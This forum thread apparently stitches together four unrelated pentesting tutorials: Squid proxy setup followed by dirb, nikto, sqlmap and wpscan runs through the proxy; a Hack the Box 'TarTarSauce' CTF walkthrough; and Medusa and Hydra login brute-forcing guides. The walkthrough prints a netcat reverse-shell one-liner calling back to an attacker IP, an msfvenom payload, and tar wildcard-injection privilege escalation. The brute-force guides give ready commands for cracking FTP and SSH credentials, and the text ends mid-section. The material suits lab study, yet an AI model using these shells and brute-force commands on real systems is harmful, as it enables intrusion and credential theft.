Login

**NINZA** · 05-14-2020, 10:00 AM

0			0

In this article, we are going to set up Squid to use it as a Proxy Server on Ubuntu/Debian machines and will try to penetrate it.
Table of content

Introduction to Proxy Setting
Squid Proxy Installation
Squid Proxy Server Configuration
Configuring Apache service for Web Proxy
Web Proxy Penetration Testing
Directory Brute force Attack on Proxy Server Using DIRB Tool
Vulnerability Scanning on Proxy Server Using Nikto Tool
SQL Injection on Proxy Server Using Sqlmap Tool
WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting
A proxy is a computer system or program that acts as a kind of middle-man or an intermediary to come between your web browser and another computer. Your ISP operates servers– computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.
For Example, Two users say A and B both have requested to access the same website of the server then Instead of retrieving the data from the original server, the proxy has “stored or cached” a copy of that site and sends it to User A without troubling the main server.
Squid Proxy Installation
Squid is a cross-functional web proxy cache server application which offers proxy and cache services for HTTP, FTP, and other common network protocols such as proxying of Secure Sockets Layer (SSL) requests and caching of Domain Name Server (DNS) lookups and implement transparent caching. Moreover, it also maintains a wide variety of caching protocols.
Let’s Begin!!
Open the host file in your local machine to add localhost address and hostname, because by default squid3 search for Ubuntu as the hostname for connection implementation.
[Image: 0.png?w=687&ssl=1]

Now use apt Repository to install squid3 and enter the following command.
apt-get install squid3
1
apt-get install squid3
[Image: 1.png?w=687&ssl=1]

Squid Proxy Server Configuration
Once the installation is completed, open its configuration file from the given path: /etc/squid3/squid.conf
With Squid’s access control, you may possibly shape the use of Internet services proxy by Squid to be accessible only employers with specific IP addresses.
Suppose you want to grant access by users of the 192.168.1.0/24 subnetworks only, then add the following line to the ACL section of the squid.conf file:
acl lan src 192.168.1.0/24
1
acl lan src 192.168.1.0/24
[Image: 2.png?w=687&ssl=1]

Now give permission to your clients to access HTTP service over the local network.
http_access allow lan
1
http_access allow lan
[Image: 3.png?w=687&ssl=1]

To set your Squid server to listen on the default TCP port 3128, change the http_port directive as given below:
http_port 3128
1
http_port 3128
[Image: 4.png?w=687&ssl=1]

Then add following roles for squid after adding HTTP_Port
request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all
1
2
3
4
request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all
[Image: 5.png?w=687&ssl=1]

You can Set forwarded_for :- on|off|transparent|truncate|delete

If set to “on”, Squid will append your client’s IP address in the HTTP requests it forwards. By default it looks like:

X-Forwarded-For: 192.1.2.3

If set to “off”, it will appear as

X-Forwarded-For: unknown

If set to “transparent”, Squid will not alter the

X-Forwarded-For header in any way.

If set to “delete”, Squid will delete the entire

X-Forwarded-For header.

If set to “truncate”, Squid will remove all existing

Here we had set forwarded_for off and save the file, then use the following command to restart the Squid Proxy.
sudo service squid3 restart
1
sudo service squid3 restart
[Image: 7.png?w=687&ssl=1]

Configuring Apache service for Web Proxy
Now open the “000-default.conf” file from the path: /etc/apache2/sites-available/ and add the following line to implement the following rules on /html directory over localhost or Machine IP (192.168.1.103)
<Directory /var/www/html/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order deny,allow
deny from all
allow from 127.0.0.1 192.168.1.103
</Directory>
1
2
3
4
5
6
7
<Directory /var/www/html/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order deny,allow
deny from all
allow from 127.0.0.1 192.168.1.103
</Directory>
Now the save the file and restart the apache service with the help of the following command.
service apache2 start
1
service apache2 start
[Image: 8.png?w=687&ssl=1]

Now when someone tries to access web services through our network i.e. 192.168.1.103, he/she will welcome by following web page
“Error 403 forbidden You don’t have permission to access <requested page>”.
[Image: 9.png?w=687&ssl=1]

When you face that such type of situation where port 80 is open but you are unable to access it, hence proved the network is running behind the proxy server.
[Image: 10.1.png?w=687&ssl=1]

Web Proxy Penetration Testing
For web Proxy penetration testing we had already set-up lab for web application servers such as DVWA and SQli DHAKKAN (Read Article from

[To see content please register here]

) and WordPress (Read Article from

[To see content please register here]

).
Now to test whether our proxy server is working or not by configuring , let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings and then select “Manual proxy configuration” and enter proxy server IP address (192.168.1.103) and Port (3128) to be used for all protocol.
[Image: 10.png?w=687&ssl=1]

BOOMMM!! Connected to the Proxy server successfully using HTTP Proxy in our Browser.
[Image: 11.png?w=687&ssl=1]

Directory Brute force Attack on Proxy Server Using DIRB Tool
While making directory brute force attack with the help of DIRB we can use –p option, it enables proxy URL to be used for all requests, by default it works on port 1080. As you have observed, on exploring target network IP in the web browser it put up “Access forbidden error” which means this web page is running behind some proxy.
dirb

[To see content please register here]

dirb

[To see content please register here]

–p 192.168.1.103:3128
1
2
dirb

[To see content please register here]

dirb

[To see content please register here]

–p 192.168.1.103:3128
From the given below image, you can take reference for the output result obtained for above commands, here we haven’t obtained any directory or file on executing 1st command whereas in 2nd command executed successfully.
[Image: 12.png?w=687&ssl=1]

Vulnerability Scanning on Proxy Server Using Nikto Tool
Similarly while scanning any network running behind a proxy server, we can use -useproxy option to scan the vulnerability.
nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy

[To see content please register here]

1
2
nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy

[To see content please register here]

From the given below image, you can take reference for the output result obtained for the above commands, here we haven’t obtained any result on executing 1st command whereas in 2nd command executed successfully.
[Image: 13.png?w=687&ssl=1]

SQL Injection on Proxy Server Using Sqlmap Tool
As you have observed, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.
sqlmap -u

[To see content please register here]

--dbs
1
sqlmap -u

[To see content please register here]

--dbs

Hence we can use –proxy options to connect to the target URL, therefore execute the following command:
sqlmap -u

[To see content please register here]

--dbs --proxy

[To see content please register here]

1
sqlmap -u

[To see content please register here]

--dbs --proxy

[To see content please register here]

Now from the given below image, you can observe that we have successfully retrieve database name by exploiting SQL injection vulnerability.
[Image: 16.png?w=687&ssl=1]

WordPress Scanning on Proxy Server Using WPScan Tool
As you have observed, on executing following command it put up “403 forbidden error” which means this web page is running behind some proxy.
wpscan --url

[To see content please register here]

--wp-content-dir wp-content
1
wpscan --url

[To see content please register here]

--wp-content-dir wp-content
Hence we can use –proxy options to connect to the target URL, therefore execute the following command:
wpscan --url

[To see content please register here]

--wp-content-dir wp-content --proxy

[To see content please register here]

1
wpscan --url

[To see content please register here]

--wp-content-dir wp-content --proxy

[To see content please register here]

Hopefully, you have found this article very helpful and completely understood the working of the Proxy server and another related topic cover in this article.
[Image: 17.png?w=687&ssl=1]

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Expert
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88
Penetrating Methodology

Network scanning (Nmap)
Directory Enumeration (Drib)
Exploiting WordPress against RFI Vulnerability
Spawning TTY shell
Check sudoers list permissions
Wildcard injection privilege escalation
Modify the backup file to get root flag

Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -A 10.10.10.88
1
nmap -A 10.10.10.88
From the given below image, you can observe we found port 80 is open for http service and found robot.txt with 5 disallowed entries.
[Image: 1.png?w=687&ssl=1]

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.
[Image: 2.png?w=687&ssl=1]

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.
dirb

[To see content please register here]

dirb

[To see content please register here]

1
2
dirb

[To see content please register here]

dirb

[To see content please register here]

Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.
[Image: 4.png?w=687&ssl=1]

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).
[Image: 5.png?w=687&ssl=1]

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
[Image: 7.png?w=687&ssl=1]

We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access the “onuma” directory. So we spawn a tty shell using python to check the sudoers list.
python -c "import pty; pty.spawn('/bin/bash')"
1
python -c "import pty; pty.spawn('/bin/bash')"
We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.
sudo -l
1
sudo -l
[Image: 8.png?w=687&ssl=1]

We create an nc reverse shell using msfvenom.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R
1
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R
[Image: 9.png?w=687&ssl=1]

Now we move to the reverse shell and create a bash file using the nc command and save it as “wp.sh”.
Now tar has the ability to execute the command using “–checkpoint-action”. So we created a file named “–checkpoint-action=exec=sh wp.sh” and “–checkpoint=1”. So that we can execute our command as user onuma.
mkdir data
cd data
echo "mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0</tmp/cezbk | /bin/sh>/tmp/cezbk 2>&1; rm /tmp/cezbk" > wp.sh
echo "" > "--checkpoint-action=exec=sh wp.sh"
echo "" > --checkpoint=1
sudo -u onuma /bin/tar cf archive.tar *
1
2
3
4
5
6
mkdir data
cd data
echo "mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0</tmp/cezbk | /bin/sh>/tmp/cezbk 2>&1; rm /tmp/cezbk" > wp.sh
echo "" > "--checkpoint-action=exec=sh wp.sh"
echo "" > --checkpoint=1
sudo -u onuma /bin/tar cf archive.tar *

[Image: 10.png?w=687&ssl=1]

We use setup our listener using netcat, as soon as we run the tar command as user “onuma” we get our reverse shell as user “onuma”. Now we change the directory to /home/onuma and find the file called “user.txt” we take a look at the content of the file and find the 1st flag. After finding the flag we spawn a tty shell using python.
python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'
[Image: 11.png?w=687&ssl=1]

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.
[Image: 13.png?w=687&ssl=1]

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.
[Image: 14.png?w=687&ssl=1]

We use a script that takes advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script

[To see content please register here]

. After running the script we find the root flag.
[Image: 15.png?w=687&ssl=1]

Hello friends!! Today we are going to discuss – How much impactful Medusa is in cracking login credential of various protocols to make unauthorized access to a system remotely. In this article, we have discussed each option available in Medusa to make a brute force attack in the various scenario.
Table Of Content

Introduction to Medusa and its features
Password Cracking For Specific Username
Username Cracking for Specific Password
Cracking Login Credential
Making Brute Force Attack on Multiple Host
Attacking on Specific Port Instead of Default
NULL/Same as Login Attempt
Save logs to Disk
Stop on Success
Suppress Startup Banner
Verbose Mode
Error Debugging Mode
Using Combo Entries
Resuming the Brute Force Attack

Introduction to Medusa and its features
Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers the following items as some of the key features of this application:

Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.
Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, POP3, MS-SQL, SSHv2, among others)

Reference Source:

[To see content please register here]

]
Type “Medusa” in the terminal without any options, it will dump all the available options it accepts along with their respective description.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module’s usage information
-v [NUM] : Verbose level [0 – 6 (more)]
-w [NUM] : Error debug level [0 – 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
[Image: 1.png?w=687&ssl=1]

As said above medusa is a brute forcing tool and you can use -d option to identify all available modules it contains.
[Image: 2.1.png?w=687&ssl=1]

Password Cracking For Specific Username
Medusa is a very impactful tool and also quite easy to use for making a brute force attack on any protocol.
Assume you want to crack the password for FTP (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.
At that moment you should go with the following command where -u option enables username parameter and -P options enable dictionary for the password list.
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp
1
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.
[Image: 2.png?w=687&ssl=1]

Username Cracking for Specific Password
Assume you want to crack username for FTP (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is a vice-versa situation compare to the above situation.
At that moment you should go with the following command where -U option enables dictionary for username list and -p options enable password parameter.
medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp
1
medusa -h 192.168.1.108 -U user.txt -p 123 -M ftp
As you can observe it has found 1 valid username: raj for password: 123 FTP login.
[Image: 3.png?w=687&ssl=1]

Cracking Login Credential
Suppose you want to crack username and password for FTP (or any other), wish to make username and password brute force attack by using a dictionary to guess the valid combination
At that moment you should go with following command where -U option enables dictionary for username list and – P options enables dictionary for the password list.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
1
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
As you can observe it has found 1 valid username: raj for the password: 123 FTP login.
[Image: 4.png?w=687&ssl=1]

Making Brute Force Attack on Multiple Host
If you want to use a user-pass dictionary on multiple hosts in a network then you can use -M option that enables the host list parameter and make brute force attack using the same dictionary and will try the same number of login attempt on each HOST IP mention in the host list.
Here you can observe I had saved two host IP in a text file and then use the following command to make brute force attack on multiple hosts by using the same dictionary.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp
1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp
As you can observe it has found 2 valid FTP logins on each Host.
[Image: 5.png?w=687&ssl=1]

If you have multiple host IP in your host list and you want to make brute force attack only a few numbers of the host then use -T option for the total number of hosts to be tested concurrently.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2
1
2
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 2
As you can observe from given below the 1st command make brute force attack on single Host IP whereas in 2nd command it is making brute force attack on two hosts IP simultaneously.
[Image: 6.png?w=687&ssl=1]

Attacking on Specific Port Instead of Default
Due to security concern, the network admin changes the port number of a service on another port. Medusa makes brute force attack on the default port of service as you can observe in above all attacks it has automatically made an attack on port 21 for FTP login.
But you can use -n option that enables specific port number parameter and launch the attack on mention port instead of default port number.
Suppose on scanning the target network I found SSH is running port 2222 instead of 22, therefore, I will execute the following command for ssh login attack.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222
1
2
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ssh -n 2222
As you can observe, in 1st command of medusa it fails to connect on ssh as port 22 was close and it has found 1 valid password: 123 for username: raj for SSH login @ port 2222.
[Image: 7.png?w=687&ssl=1]

NULL/Same as Login Attempt
Using option -e along with ns enables three parameters null/same as login while making brute force attack on the password field.
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns
1
medusa -h 192.168.1.108 -u raj -P pass.txt -M ftp -e ns
As you can observe with every username, it is trying to match the following combination along with the password list.
User “raj” and password “” as null password
User “raj” and password “raj” as same as the login
[Image: 8.png?w=687&ssl=1]

Save logs to Disk
For the purpose of the record maintenance, better readability, and future references, we save the output of the Medusa brute force attack onto a file. To this we will use the parameter -O of the Medusa to save the output in a text file.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -O log.txt
1
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -O log.txt
Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case, our location for output is /root /log.txt.
[Image: 9.png?w=687&ssl=1]

Stop on Success
Suppose while using host list you want to Stop brute force attack on the host after first valid username/password found then you can use -f option alone with command.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f
1
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -f
[Image: 10.png?w=687&ssl=1]

Even you can use -F option to Stop audit after first valid username/password found on any host in your command.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F
1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -F
[Image: 11.png?w=687&ssl=1]

Suppress Startup Banner
If you want to hide banner of Medusa while making brute force attack then use -b option to Suppress startup banner.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b
1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -b
[Image: 12.png?w=687&ssl=1]

Verbose Mode
There are six levels for the verbose mode to examine the attack details and also contain an error debug option that contains ten levels for debug mode. You can use -v option for verbose parameter and -w option for error debugging parameter.
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6
1
2
3
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 1
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 2
medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -v 6
[Image: 13.png?w=687&ssl=1]

Error Debugging Mode
As said above there is level from 0-10 for examining brute force attack at each level, here you will observe the result of 0-6 is approx. same with little difference and result from of level 7-10 is approx. same but varied from 0-6 level.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 01
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 06
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 07
1
2
3
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 01
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 06
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -w 07
Debug mode is showing wait time, socket, send data size and received data size, module detail, and path.
[Image: 14.1.png?w=687&ssl=1]

Using Combo Entries
Using -C option enables combo file parameter, the combo file should have one record per line and have the values colon separated in the format host_IP:username: password. If any of the three fields are left blank, the respective information should be delivered either as a global value or as a list in a file.
The following combinations are possible in the combo file:
host:username:password
host:username:
host::-
:username: password
:username:
:: password
host::password
As you can observe in the given below image, we have the userpass.txt file as our combo file format and we can use it along -C option to launch brute force attack.
medusa -M ftp -C userpass.txt
1
medusa -M ftp -C userpass.txt
[Image: 14.png?w=687&ssl=1]

Resuming the Brute Force Attack
Sometimes while making brute force, the attack gets paused/halt or cancel accidently at this moment to save your time you can use -z option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from 1st attempt.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
1
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
Now you can observe the output result from the given below image where after pressing ctrl C it stops the attack and then adds the highlighted text in your command to resume the attack and continue it.
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.
1
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u2u3.
Repeat same as above, now compare the result after executing all three command you will notice it has continued the brute-forcing from the last dropped attempt
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.
1
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp -Z h1u3u4.
[Image: 15.png?w=687&ssl=1]

Hello friends!! Today we are going to discuss – How much impactful hydra is in cracking login credentials of various protocols to make unauthorized access to a system remotely. In this article, we have discussed each option available in hydra to make brute force attacks in the various scenario.
Table of Content

Introduction to hydra
Multiple Features of Hydra
Password Guessing For Specific Username
Username Guessing For Specific Password
Cracking Login Credential
Use of Verbose or Debug Mode for Examining Brute Force
NULL/Same as Login/Reverse login Attempt
Save Output to Disk
Resuming The Brute Force Attack
Password Generating Using Various Set of Characters
Attacking on Specific Port Instead of Default
Making Brute Force Attack on Multiple Hosts

Introduction to Hydra
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
[Image: 1.png?w=687&ssl=1]

Multiple Feature of Hydra
Since we are using GNOME build of Kali Linux, therefore, the “the-hydra” package is already included by default, all we need to do, open the terminal and just type “hydra -h” and press Enter. You will be welcomed by its help screen.
-R : restore a previous aborted/crashed session
-I : ignore an existing restore file.
-S : perform an SSL connect
-s : PORT if the service is on a different default port, define it here
-l LOGIN or -L : FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P : FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET : password bruteforce generation, type “-x -h” to get help
-e nsr : try “n” null password, “s” login as pass and/or “r” reversed login
-u : loop around users, not passwords (effective! implied with -x)
-C FILE : colon separated “login:pass” format, instead of -L/-P options
-M FILE : list of servers to be attacked in parallel, one entry per line
-o FILE : write found login/password pairs to FILE instead of stdout
-f / -F : exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS : run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME : wait time for responses (32s) / between connects per thread
-4 / -6 : prefer IPv4 (default) or IPv6 addresses
-v / -V / -d : verbose mode / show login+pass for each attempt / debug mode
-U : service module usage details
server : the target server (use either this OR the -M option)
service : the service to crack (see below for supported protocols)
OPT : some service modules support additional input (-U for module help)
Reference Source:

[To see content please register here]

Password Guessing For Specific Username
Hydra is a very impactful tool and also quite easy to use for making a brute force attack on any protocol.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[ Tongue

ORT][/OPT]]
Suppose you want to crack password for ftp (or any other) whose username is with you, you only wish to make a password brute force attack by using a dictionary to guess the valid password.
At that moment you should go with the following command where -l option enables username parameter and -P options enables dictionary for the password list.
hydra -l raj -P pass.txt 192.168.1.108 ftp
1
hydra -l raj -P pass.txt 192.168.1.108 ftp
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.
[Image: 3.png?w=687&ssl=1]

Username Guessing For Specific Password
Suppose you want to crack username for FTP (or any other) whose password is with you, you only wish to make a username brute force attack by using a dictionary to guess the valid username. Hence it is a vice-versa situation compared to the above situation.
At that moment you should go with the following command where -L option enables dictionary for username list and -p options enables password parameter.
hydra -L user.txt -p 123 192.168.1.108 ftp
1
hydra -L user.txt -p 123 192.168.1.108 ftp
As you can observe it has found 1 valid username: raj for the password: 123 FTP login.
[Image: 4.png?w=687&ssl=1]

Cracking Login Credential
Suppose you want to crack username and password for FTP (or any other), wish to make username and password brute force attack by using a dictionary to guess the valid combination
At that moment you should go with the following command where -L option enables dictionary for username list and – P options enables dictionary for a password list.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
1
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
As you can observe it has found 1 valid username: raj for password: 123 FTP login.
[Image: 5.png?w=687&ssl=1]

Use of Verbose or Debug Mode for Examining Brute Force
You can use -V option along with each command, with the help of verbose mode you can observe each attempt for matching the valid combination of username and password. If you will observe the given below image; then you will find there are 5 usernames in the user.txt file (L=5) and 5 passwords in a pass.txt file (P=5) and hence the total number of login attempts will be 5*5=25.
[Image: 6.png?w=687&ssl=1]

Even you can use -d option that enables debug and verbose mode together and shows complete detail of attacking mode.
[Image: 7.png?w=687&ssl=1]

As you can observe the verbose mode is showing each attempt for matching valid credential for username and password with the help of user.txt and pass.txt as well as debug mode is showing wait-time, con-wait, socket, send pid and received pid
[Image: 8.png?w=687&ssl=1]

NULL/Same as Login/Reverse login Attempt
Using option -e along with nsr enables three parameter null/same as login/reverse login while making brute force attack on the password field, if you will observe the given below image then you will notice that this time L=5 and automatically P=8 which means now the total number of login tries will be 5*8=40.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr
1
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -V -e nsr
As you can observe with every username, it is trying to match the following combination along with the password list.
Login “root” and pass “” as null password
Login “root” and pass “root” as same as the login
Login “root” and pass “toor” as the reverse of login
[Image: 9.png?w=687&ssl=1]

Save Output to Disk
For the purpose of the record maintenance, better readability, and future references, we will save the output of the hydra brute force attack in a file. To this, we will use the parameter -o of the hydra to save the output in a text file.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt
1
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -o result.txt
Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file or not. In this case, our location for output is /root /output.txt.
[Image: 10.png?w=687&ssl=1]

Resuming the Brute Force Attack
Sometimes while making brute force, the attack gets paused/halt or cancel accidentally at this moment to save your time you can use -r option that enables resume parameter and continue the brute-forcing from the last dropped attempt of the dictionary instead of starting it from the 1st attempt.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
hydra -R
1
2
hydra -L user.txt -P pass.txt 192.168.1.108 ftp
hydra -R
Now you can observe the output result from the given below image where after pressing ctrl C it stopped the attack and then type hydra -R to resume the attack and continue it.
[Image: 11.png?w=687&ssl=1]

Password Generating Using Various Set of Character
Hydra has -x option that enables password generation option that involves following instructions:
-x MIN:MAX:CHARSET
MIN is used to specify the minimum number of characters in the password
MAX is used to specify the maximum number of characters in the password
CHARSET is used to specify a specification of the characters to use in the generation valid CHARSET values are: ‘a’ for lowercase letters, ‘A’ for uppercase letters, ‘1’ for numbers, and for all others, just add their real representation.
-y disables the use if the above letters as placeholders
Now suppose we want to try 123 as the password for that I should set MIN=1, MAX=3 CHARSET 1 for generating a numeric password for the given username and run following command as said.
hydra -l shubham -x 1:3:1

[To see content please register here]

or
hydra -l raj -x 1:3:1 192.168.1.108 ftp
hydra -l raj -x 1:3:1 192.168.1.108 ftp -y
1
2
3
4
hydra -l shubham -x 1:3:1

[To see content please register here]

or
hydra -l raj -x 1:3:1 192.168.1.108 ftp
hydra -l raj -x 1:3:1 192.168.1.108 ftp -y
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.
[Image: 12.png?w=687&ssl=1]

Now suppose we want to try abc as the password for that I should set MIN=1, MAX=3 CHARSET a for generating lowercase character password for the given username and run following command as said.
hydra -l shubham -x 1:3:a

[To see content please register here]

-V
1
hydra -l shubham -x 1:3:a

[To see content please register here]

-V

As you can observe it has found 1 valid password: abc for username: shubham for FTP login.
[Image: 14.png?w=687&ssl=1]

Attacking on Specific Port Instead of Default
Due to security concern; the network admin can change the port number of a service on another port. Hydra makes brute force attack on the default port of service as you can observe in above all attacks it has automatically made the attack on port 21 for FTP login.
But you can use -s option that enables specific port number parameter and launch the attack on mention port instead of default port number.
Suppose on scanning the target network; I found FTP is running port 2121 instead of 21, therefore, I will execute the following command for FTP login attack.
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121
1
hydra -L user.txt -P pass.txt 192.168.1.108 ftp -s 2121
As you can observe it has found 1 valid password: 123 for username: raj for FTP login.
[Image: 15.png?w=687&ssl=1]

Making Brute Force Attack on Multiple Host
If you want to use a user-pass dictionary on multiple hosts in a network then you can use -M option that enables the host list parameter and make brute force attack using the same dictionary and will try the same number of login attempt on each HOST IP mentioned in the host’s list.
Here you can observe I had saved two host IP in a text file and then used the following command to make brute force attack on multiple hosts by using the same dictionary.
